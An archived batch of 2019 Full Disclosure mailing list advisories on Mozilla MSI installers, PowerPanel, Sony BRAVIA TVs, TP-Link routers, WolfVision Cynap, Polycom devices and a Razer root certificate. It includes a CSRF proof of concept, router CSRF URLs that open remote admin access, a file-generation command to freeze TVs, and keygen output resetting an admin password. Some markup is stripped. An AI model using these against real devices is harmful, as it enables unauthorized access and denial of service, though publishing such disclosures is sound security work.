[FD] Mozilla's MSI installers: FUBAR (that's spelled "fucked-up beyond all repair")

2019-07-09 Thread Stefan Kanthak 
Hi @ll,

Mozilla finally provides MSI installers for their just released
Firefox 68 and Firefox 68 ESR for Windows:



These MSI installers are but DEFECTIVE, VULNERABLE and a bluff:
Mozilla just wrapped their (UPX-compressed) 7-zip self-extractors,
which unpack the final NSIS installer to %TEMP% and run it from
there, preserving but all their already reported deficiencies and
vulnerabilities: see (among others)



Demonstration:
~~
In the user account created during Windows setup, add the NTFS
ACL "(D;OIIO;WP;;;WD)" meaning "deny execution of files for
everybody, inheritable to files in all subdirectories" to your
%TEMP%\ directory, then run the MSI installer.

As soon as the error dialog "7-Zip: (x) Access Denied!" is shown
peek into %SystemRoot%\Installer\ and your %TEMP%\ directory:

- the most recent "%SystemRoot%\Installer\MSI<4 hex digits>.tmp"
  is the UPX-compressed 7-zip self-extractor which is wrapped in
  the bogus MSI installer;

- this 7-zip self-extractor is run (elevated!) with the following
  command line:
  MSI*.tmp /S /TaskbarShortcut=true /DesktopShortcut=true 
/StartMenuShortcut=true /MaintenanceService=true
/RemoveDistribution=true /PreventRebootRequired=false /OptionalExtensions=true 
/LaunchedFromMSI

- it creates an UNPROTECTED subdirectory %TEMP%\7zS<8 hex digits>\
  which inherits the NTFS ACL from its parent %TEMP%\, thus
  granting full access for the (unprivileged) user account, who
  can tamper with the extracted files in any way, then runs (here:
  tries to run) the extracted "%TEMP%\7zS<8 hex digits>\setup.exe"
  elevated.


stay tuned, and FAR away from Mozilla's crap!
Stefan Kanthak

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery

2019-07-09 Thread Joey Lane via Fulldisclosure 
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request
Forgery
# Date: 7/9/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : CVE-2019-13071
# Reported to vendor on 5/25/2019, no acknowledgement.

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page.  Create a file named 'csrf.html' on a local workstation
with the following contents:




  
  
  
  
  
  
  
  


document.getElementById("csrf-form").submit()

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording.  This could be adapted to exploit other forms in the web
application as well.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in Sony BRAVIA Smart TVs

2019-07-09 Thread xen1thLabs 
## ADVISORY INFORMATION

TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs
ADVISORY URL:
CVE-2019-11889

https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/
CVE-2019-11890

https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-over-wifi-lan-internet-vulnerability-xl-19-013/
 

DATE PUBLISHED: 02/07/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-11889, CVE-2019-11890
CVSSv3 for CVE-2019-11889: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSSv3 for CVE-2019-11890: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

## PRODUCT DESCRIPTION
BRAVIA is a brand of Sony Visual Products known as Smart TVs. 
These Smart TVs are known to be high standard products.


## DETAILS OF VULNERABILITIES
xen1thLabs has found two vulnerabilities in Sony products and coordinated 
the disclosure of these security flaws with Sony. The vulnerabilities have 
been found in the Sony Bravia Smart TV by xen1thLabs while auditing the 
security of Smart TVs. The list of affected models has not been shared by Sony. 
xen1thLabs tested several Sony Bravia Smart TVs.

The summary of the vulnerabilities is:

- CVE-2019-11889 Sony Remote Denial-of-Service Triggered Over HbbTV 
Vulnerability:
This vulnerability allows an attacker to remotely crash the HbbTV rendering 
engine and block the TV

- CVE-2019-11890 Sony Remote Denial-of-Service Over Wifi / LAN / Internet
Vulnerability:
This vulnerability allows an attacker to remotely crash the Smart TV using
TCP packets.

### 1. CVE-2019-11889 Sony Remote Denial-of-Service Triggered Over HbbTV 
Vulnerability
By sending a specifically crafted webpage over HbbTV it is possible to freeze 
the 
television remotely. (please see the presentation at HiTB Dubai 2018 for HbbTV 
description 
https://conference.hitb.org/hitbsecconf2018dxb/sessions/hacking-into-broadband-and-broadcast-tv-systems/),
 

The remote control does not appear to work except the PROG+ and PROG- buttons. 
Only changing channels allows to 'un-freeze' the television. Android is 
supposed 
to kill blocked applications.

In order to reproduce the behavior, start by generating a webpage using: 

```
dd if=/dev/zero of=index.html bs=1M count=2048


Using the software-defined radio, send a DVB-T signal containing a HbbTV 
application that force 
the targeted Smart TV to load a file from a controlled server. By forcing the 
Smart TV to load 
the generated file, it can be observed from the logs, only between 180KB and 
250KB are served 
before the HbbTV application freezes:

```
vaccess.log:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:06:40:54 -0400] "GET 
/hbbtvtest/test3/ HTTP/1.1" 
200 178647 "http://x.test/hbbtvtest/index.php; "Mozilla/5.0 (Linux armv7l) 
AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 
HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) 
sony.hbbtv.tv.2016HE"


```
vaccess.log.1:127.0.1.1:80 192.168.1.191 - - [01/Apr/2019:02:36:16 -0400] "GET 
/hbbtvtest/test3/ HTTP/1.1" 
200 170543 "http://x.test/hbbtvtest/index.php; "Mozilla/5.0 (Linux armv7l) 
AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/42.0.2311.152 Safari/537.36 OPR/29.0.1803.0 OMI/4.5.23.37.ALSAN5.131 
HbbTV/1.2.1 (; Sony; KD-65X7500D; v1.0; 2016;) 
sony.hbbtv.tv.2016HE"

Sony investigated the issue and shared the following analysis:
"MITM attack by http connection is caused by the specification of the HbbTV 
service". 

### 2. CVE-2019-11890 Sony Remote Denial-of-Service Over Wifi / LAN / Internet 
Vulnerability

An unauthenticated remote attacker can synflood the Smart TV over LAN and 
Wi-Fi, the smart 
television freezes and becomes irresponsive, some programs crash and the 
television reboots 
randomly. No PoC is released due to low complexity level of exploitation as 
Sony is not 
planning to release a security patch.

Sony investigated the issue and shared the following analysis:
"The Sony Product teams have conducted additional research regarding the 
submission and 
identified the following: CVE-2019-1189: DoS over WiFi /LAN - This is due to 
the performance 
of the interrupt operation in the Linux driver".

## SOLUTION
Sony provided the following recommendation:
"Sony's manual instructs users to: Make sure to connect to the Internet or home 
network 
via a router, which will minimize this risk. In addition, these two symptoms 
can be 
recovered by unplugging the power supply cable. The TV cannot be broken and 
there is no 
internal data that can be stolen by these actions." (May 30th, 2019).

And informed xen1thLabs that:
"we will not be releasing any notifications." (June 19th, 2019).

## DISCLOSURE TIMELINE
01/04/2019 - Vulnerabilities have been found by xen1thLabs
28/04/2019 - xen1thLabs send the report to Sony through their HackerOne Bug 
bounty program
02/05/2019 - Updates requested from xen1thLabs through HackerOne
10/05/2019 -

[FD] Vulnerabilities in TP-Link TL-WR940N and TL-WR941ND

2019-07-09 Thread MustLive 
Hello list!

There are Brute Force and Cross-Site Request Forgery vulnerabilities
in TP-Link TL-WR940N and TL-WR941ND. After my advisory about
vulnerabilities in TP-Link TL-WR841N and TL-WR841ND in 2017.

-
Affected products:
-

Vulnerable are the next models: TP-Link TL-WR940N and TL-WR941ND,
Firmware Version 3.16.9 Build 151216. All other versions also must be
vulnerable. I informed TP-Link about vulnerabilities in different
their devices since 2017, but there were no answers from vendor.

--
Details:
--

Brute Force (WASC-11):

http://192.168.0.1

No protection from BF attacks in login form. By default access from
Internet is closed, so it's possible to pick up password only via LAN.
But via CSRF attacks it's possible to open remote access.

Cross-Site Request Forgery (WASC-09):

In section Remote Control.

Turn off access via
Internet:http://192.168.0.1/YVNLOORCJBATZQDB/userRpm/ManageControlRpm.htm?port=80=0.0.0.0=1

Turn on access via
Internet:http://192.168.0.1/YVNLOORCJBATZQDB/userRpm/ManageControlRpm.htm?port=80=255.255.255.255=1

For protection bypass it's needed to set Referer header and path
(YVNLOORCJBATZQDB), that changes every time at login to admin panel.
This path can be found through information leakage, social engineering
or XSS vulnerabilities in admin panel. In old versions there is no
such protection, so it's easy to conduct this and other CSRF attacks.

Cross-Site Request Forgery (WASC-09):

Logout from admin panel via request to page http://192.168.0.1.

http://192.168.0.1;>

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8407/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] UPDATE: [SYSS-2019-021]: WolfVision Cynap - Use of Hard-coded Cryptographic Key (CWE-321) [CVE-2019-13352]

2019-07-09 Thread Matthias Deeg 
Advisory ID: SYSS-2019-021
Product: Cynap
Manufacturer: WolfVision
Affected Version(s): 1.18g, 1.28j
Tested Version(s): 1.18g, 1.28j
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2019-05-03
Solution Date: 2019-06-19
Public Disclosure: 2019-07-04
CVE Reference: CVE-2019-13352
Authors of Advisory: Manuel Stotz, Gerhard Klostermeier (SySS GmbH)



Overview:

WolfVision Cynap is a wireless collaboration and presentation system.

The manufacturer describes the product as follows [1]:

"Cynap is a stand-alone all-in-one wireless collaboration and
presentation system which includes a built-in media player, web
conferencing, on-board recording and streaming , BYOD screen sharing
for all mobile devices, and annotation functionality, making it the
ideal device to form the centrepiece of new and adapted classrooms and
meeting spaces."

Due to the use of a hard-coded cryptographic key, an attacker can
generate support PINs for resetting the administrative user password in
order to gain administrative access to the device.



Vulnerability Details:

SySS GmbH found out that the WolfVision Cynap wireless collaboration
and presentation system uses a static, hard-coded cryptographic secret
for generating support PINs used for the provided 'forgot password'
functionality.

By knowing this static secret and the corresponding algorithm for
calculating support PINs, an attacker can reset the password of the
administrative user account "ADMIN" and thus gain unauthorized access to
the affected Cynap device via a network connection.



Proof of Concept (PoC):

SySS GmbH developed a software tool for generating support PINs either
in online or offline mode.

The following output of the software tools illustrates a successful
attack resulting in a reset password for the administrative user
account "ADMIN".

$ python ./wolfvision_cynap_keygen.py --online 192.168.40.109
WolfVision vSolution Cynap Keygen
   by
  Manuel Stotz
  Gerhard Klostermeier

[*] Launch keygen in online mode ... [OK]
[*] Gathering data ... [OK]
[*] Serialnumber: 
[*] Support PIN: 447301
[*] Generating new Support PIN ... [OK]
[+] New Support PIN: 723247
[*] Account: ADMIN
[*] Password: Password
[*] Bye!

A successful attack against a vulnerable WolfVision Cynap device gaining
administrative access is demonstrated in our SySS PoC video
"Administrating WolfVision Cynap the Hacker's Way" [5].



Solution:

Install the firmware version 1.30j provided by the manufacturer
WolfVision [2].



Disclosure Timeline:

2019-05-03: Vulnerability reported to manufacturer
2019-05-10: Vulnerability reported to manufacturer again
2019-05-13: Manufacturer confirms receipt of security advisory
2019-05-31: Manufacturer schedules firmware update 1.30j with fix for
the reported security issue
2019-06-19: Release of firmware update 1.30j including security fix
2019-07-04: Public release of SySS security advisory
2019-07-08: Release of updated security advisory with assigned CVE ID



References:

[1] Product website for WolfVision Cynap

https://www.wolfvision.com/vsolution/index.php/en/presentation-systems/cynap/cynap
[2] WolfVision firmware downloads
https://wolfvision.com/vsolution/index.php/de/support/downloads
[3] SySS Security Advisory SYSS-2019-021

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-021.txt
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Administrating WolfVision Cynap the
Hacker's Way"
https://youtu.be/veEtiYAWvMY



Credits:

This security vulnerability was found by Manuel Stotz and Gerhard
Klostermeier of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

E-Mail: gerhard.klostermeier (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Gerhard_Klostermeier.asc
Key fingerprint = 8A9E 75CC D510 4FF6 8DB5 CC30 3802 3AAB 573E B2E7



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of

[FD] Polycom RealPresence Touch device vulnerable to Slowloris attack (hardware version 7; OS version 2.1.2-255)

2019-07-09 Thread Eitan shav 
[Description]
 Polycom RealPresence Touch devices (hardware version 7; operating
 system version 2.1.2-255) allow remote attackers to cause a denial of
 service (networking outage) by sending "Slowloris" packet data to the
 login interface.

 [VulnerabilityType]
 Slowloris DoS


 [Vendor of Product]
 Polycom


 [Affected Product Code Base]
RealPresence Touch device - Hardware version: 7 , operating system version: 
2.1.2-255



 [Attack Type]
 Remote


 [Has vendor confirmed or acknowledged the vulnerability?]
 true


[Discoverer]
 Eitan Shav from Citadel Cyber Security


 [Reference]
 https://www.poly.com/us/en
[Screenshots of POC]
1.The login page (before the attack): 
https://drive.google.com/open?id=1GFWdayd4Bllk9jGl6Z_ypzD7zkXTg-Rd
2.establishing the attack: 
https://drive.google.com/open?id=1yyBULB1LuWqbO4ZAqz-4XMJs6qlv4Q_l
3.Tying to access the login page (after the attack): 
https://drive.google.com/open?id=10Vp7U7RH6efX7c_V62jeq-umfyVI6o6O





[newt]


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Razer Synapse 3, Laptops Ship with Re-used Root Certificate with Private Key

2019-07-09 Thread No One 
Razer is a company that produces gaming-centric computer peripherals,
laptops, desktops, and mobile phones.  Many of their products allow for
rich customization of device lighting effects.  These features are managed
by a client application called Synapse.

On Windows, Razer Synapse 3 installs an optional component - the Razer
Chroma SDK - by default.  This component installs a root certificate - with
the private key - which is the same across installs. This key is
extractable on Windows hosts, and can subsequently be used to launch
SSL/MITM attacks against other Razer Synapse users.

Additionally, since Razer Synapse 3/Chroma SDK come pre-installed on many
Razer products - such as the Stealth and Blade laptops - many of these
consumer laptops came shipped with this root certificate already installed,
and are vulnerable out of the box.

This flaw impacts Razer Synapse 3 versions 1.0.103.136 build
3.4.0415.04181, and may impact older versions.

Some Synapse 3 versions available publicly through May and June of 2019
were not tested and may be impacted as well.

This flaw appears to have been addressed by a fix in Razer Chroma SDK Core
3.4.3, and also appears to be addressed in the latest version of Synapse 3
available on Razer's website at https://www.razer.com/synapse-3 which
installs version 1.0.103.136, build 3.4.0630.062510

These versions still install a root certificate with private key - and are
thus able to MITM local TLS network traffic and undermine other local
cryptographic operations - but the certificate is now generated per-install.

Users can confirm whether or not they're impacted by checking for the
following certificate in their Windows "Trusted Root Certification
Authorities" Store:

Common Name: Razer Chroma SDK

Thumbprint: 043eaddad0a8fbeeac75689b5b1425d90c247218

Valid from May 13, 2018 to May 10, 2028

Users can also test whether they're vulnerable by visiting
https://razerfish.org in either Chrome or Edge.  Impacted systems will not
encounter an SSL error when navigating to this website, which has an SSL
certificate signed with the re-used certificate.

End users who updated Synapse 3 appropriately may no longer be impacted.
However, users who haven't updated - or who may have removed the Chroma SDK
in non-standard ways - may still be at risk.  Similarly, many consumer
devices may be vulnerable immediately after purchase depending on their
manufacture/ship date.

Users can mitigate this risk independently by removing the above named
certificate, or downloading the latest version of Synapse 3 and confirming
that it properly removes this certificate.

*Reporting Coordination/Timeline*

This vulnerability was reported to Razer via HackerOne on Mar 20th, 2019.
There hasn't been any substantial communication from the Razer team about
their preferences on disclosure since a tentative fix was tested in April.

Given the limited response, and since an update alone isn't guaranteed to
mitigate this issue for all Razer consumers, I've opted to publish this
publicly after three requests for guidance from Razer.

March 20th - Issue reported on HackerOne

March 25th - HackerOne forwards issue to Razer

April 30th - HackerOne requests confirmation of fix in Chroma SDK Core
3.4.3, fix confirmed

May 1st - HackerOne/Razer acknowledge an initial request for public
disclosure, say they'll look into it

May 15th - HackerOne says they've not heard back from Razer

May 31st - Requested disclosure on 90-day mark/June 20th, HackerOne says
they're still waiting on an update from Razer

June 27th - Requested update on case, propose disclosure on July 8th

July 8th - No response from HackerOne or Razer, posted to FD

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/